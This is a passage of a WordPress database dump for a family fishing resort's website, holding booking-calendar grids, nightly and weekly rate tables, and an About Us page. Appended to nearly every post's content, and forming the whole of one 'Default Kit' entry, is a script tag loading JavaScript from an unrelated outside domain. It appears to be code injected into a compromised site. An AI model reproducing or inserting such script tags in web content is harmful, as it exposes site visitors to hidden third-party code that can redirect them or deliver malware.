",\"\",\"\",\"\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"S-6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"V-9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\"],[\"CAB 10\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CAB 11\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CAB 12\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CAB 13\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 14\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"27-Jun\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4-Jul\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"11-Jul\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"18-Jul\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"25-Jul\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1-Aug\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"8-Aug\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\"],[\"K-1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"S-2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-3\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"S-4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"K-5\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"S-6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"K-7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"V-9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CAB 10\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CAB 11\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CAB 12\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CAB 13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CAB 14\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-12-31 10:38:11','2019-12-31 16:38:11','',835,'https://ashbyresort.com/835-revision-v1/',0,'revision','',0),(937,3,'2019-12-31 10:47:43','2019-12-31 16:47:43','[[\"\",\"23-May\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"30-May\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6-Jun\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"13-Jun\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"20-Jun\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"27-Jun\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4-Jul\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\"],[\"K-1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"S-2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-3\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\"],[\"S-4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"K-5\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"S-6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-7\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"V-9\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CAB 10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 11\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 12\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 13\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CAB 14\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-12-31 10:47:43','2019-12-31 16:47:43','',835,'https://ashbyresort.com/835-revision-v1/',0,'revision','',0),(938,3,'2020-02-03 10:07:18','2020-02-03 16:07:18','[[\"2019\",\"Bedrooms\",\"Weekday Nightly\",\"Weekend Holiday Nightly\",\"Weekly Sept. \\u2013 May\",\"Weekly June \\u2013 Aug.\",\"Maximum Capacity\"],[\"Sleepers Motel\\nSept 20- April 30\",\"1\",\"$80\",\"$80\",\"$450\",\"\",\"4\"],[\"Kitchenettes Motel\\nSept 20- April 30\",\"1\",\"$100\",\"$100\",\"$600\",\"\",\"4\"],[\"Sleepers Motel\",\"1\",\"$90.\",\"$100.00\",\"$450.00\",\"$550.00\",\"4\\n\"],[\"Kitchenettes Motel\",\"1\",\"$110.00\",\"$130.00\",\"$600.00\",\"$700.00\",\"4\"],[\"Suite 9\",\"2\",\"$200.00\",\"$230.00\",\"$1000.00\",\"$1,175.00\",\"4\"],[\"Cabins (#10 #11 #12)\",\"2\",\"$200.00\",\"$230.00\",\"$1000.00\",\"$1,175.00\",\"8\"],[\"Cabins (#13 #14)\",\"2\",\"$220.00\",\"$250.00\",\"$1,100.00\",\"$1,275.00\",\"8\"],[\"Camping non-electric\",\"1 per site\",\"$35.00\",\"$35.00\",\"$180.00\",\"$180.00\",\"\"],[\"Camping with electric\",\"1\\u00a0 per site\\n\",\"$45.00\",\"$45.00\",\"$250.00\",\"$250.00\",\"\"],[\"Drive Thru sites, elec, water and sewer\",\"1 per site\",\"$60.00\",\"$60.00\",\"$300.00\",\"$300.00\",\"\"],[\"Pets (two pets per campsite)\",\"\",\"$10.00/ Pet\",\"$10.00/ Pet\",\"$50.00/ Pet\",\"$50.00/ Pet\",\"\"],[\"Pet in Cabins or Motel rooms\",\"\",\"$25.00/ Pet\",\"$25.00/ Pet\",\"$125.00/ Pet\",\"$125.00/ Pet\",\"\"],[\"Additional People Camping (Each)\",\"\",\"$5.00\",\"$5.00\",\"$25.00\\n\",\"$25.00\\n\",\"\"],[\"Additional People in Motel and Cabins (Each)\",\"\",\"$25.00\",\"$25.00\",\"$125.00\\n\",\"$125.00\\n\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','2020 Rates','Call us at 218-747-2959 for reservations  \nNO checkins after 10:00 PM !!\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.  Balance is due upon arrival.\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nAll Guests must check in upon arrival. \nWireless Internet Available','inherit','closed','closed','','679-revision-v1','','','2020-02-03 10:07:18','2020-02-03 16:07:18','',679,'https://ashbyresort.com/679-revision-v1/',0,'revision','',0),(939,3,'2020-02-03 10:10:52','2020-02-03 16:10:52','[[\"2020\",\"Bedrooms\",\"Weekday Nightly\",\"Weekend Holiday Nightly\",\"Weekly Sept. \\u2013 May\",\"Weekly June \\u2013 Aug.\",\"Maximum Capacity\"],[\"Sleepers Motel\",\"1\",\"$90.\",\"$100.00\",\"$450.00\",\"$550.00\",\"4\\n\"],[\"Kitchenettes Motel\",\"1\",\"$110.00\",\"$130.00\",\"$600.00\",\"$700.00\",\"4\"],[\"Suite 9\",\"2\",\"$200.00\",\"$230.00\",\"$1000.00\",\"$1,175.00\",\"4\"],[\"Cabins (#10 #11 #12)\",\"2\",\"$200.00\",\"$230.00\",\"$1000.00\",\"$1,175.00\",\"8\"],[\"Cabins (#13 #14)\",\"2\",\"$220.00\",\"$250.00\",\"$1,100.00\",\"$1,275.00\",\"8\"],[\"Camping non-electric\",\"1 per site\",\"$35.00\",\"$35.00\",\"$180.00\",\"$180.00\",\"\"],[\"Camping with electric\",\"1\\u00a0 per site\\n\",\"$45.00\",\"$45.00\",\"$250.00\",\"$250.00\",\"\"],[\"Drive Thru sites, elec, water and sewer\",\"1 per site\",\"$60.00\",\"$60.00\",\"$300.00\",\"$300.00\",\"\"],[\"Pets (two pets per campsite)\",\"\",\"$10.00/ Pet\",\"$10.00/ Pet\",\"$50.00/ Pet\",\"$50.00/ Pet\",\"\"],[\"Pet in Cabins or Motel rooms\",\"\",\"$25.00/ Pet\",\"$25.00/ Pet\",\"$125.00/ Pet\",\"$125.00/ Pet\",\"\"],[\"Additional People Camping (Each)\",\"\",\"$5.00\",\"$5.00\",\"$25.00\\n\",\"$25.00\\n\",\"\"],[\"Additional People in Motel and Cabins (Each)\",\"\",\"$25.00\",\"$25.00\",\"$125.00\\n\",\"$125.00\\n\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','2020 Rates','Call us at 218-747-2959 for reservations  \nNO checkins after 10:00 PM !!\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.  Balance is due upon arrival.\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nAll Guests must check in upon arrival. \nWireless Internet Available','inherit','closed','closed','','679-revision-v1','','','2020-02-03 10:10:52','2020-02-03 16:10:52','',679,'https://ashbyresort.com/679-revision-v1/',0,'revision','',0),(940,0,'2020-02-21 17:29:44','2020-02-21 23:29:44','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Default Kit','','publish','closed','closed','','default-kit','','','2020-02-21 17:29:44','2020-02-21 23:29:44','',0,'https://ashbyresort.com/?elementor_library=default-kit',0,'elementor_library','',0),(941,3,'2020-05-04 15:45:55','2020-05-04 20:45:55','<p><strong>IF YOUR LOOKING FOR A VACATION DREAM<br />WE HAVE YOUR DREAM VACATION</strong></p><p>Relax, Unwind and enjoy the sunsets !!</p><p>Ashby Resort is located in Grant County, Minnesota on beautiful Pelican Lake.The lake is approx. 4,000 acres. We are just off highway 94 midway between Alexandria and Fergus Falls.<br />Ashby Resort is a family owned fishing resort. Owner, Dean Beneke, is here to help you enjoy a timeless Minnesota fishing tradition.<br />Approximately 80% of our customer\'s return to the resort each year and many have done it for several generations.<br />The Resort is nestled on 10 acres of land on the north side of the lake and has something for everyone. The ultimate location for your family\'s reunion. We have five Cabins, seven Motel rooms both with and without Kitchens and a newly remodeled 2 bedroom lakeside villa. There are also 16 lakeside/view campsites for your camper or tent.</p><p>Gently sloping sandy beach/swim area</p><p>WIFI AVAILABLE</p><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','About Us','','inherit','closed','closed','','12-revision-v1','','','2020-05-04 15:45:55','2020-05-04 20:45:55','',12,'https://ashbyresort.com/12-revision-v1/',0,'revision','',0),(944,3,'2020-05-12 19:40:38','2020-05-13 00:40:38','[[\"\",\"23-May\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"30-May\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6-Jun\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"13-Jun\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"20-Jun\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"27-Jun\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4-Jul\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\"],[\"K-1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\"],[\"S-2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\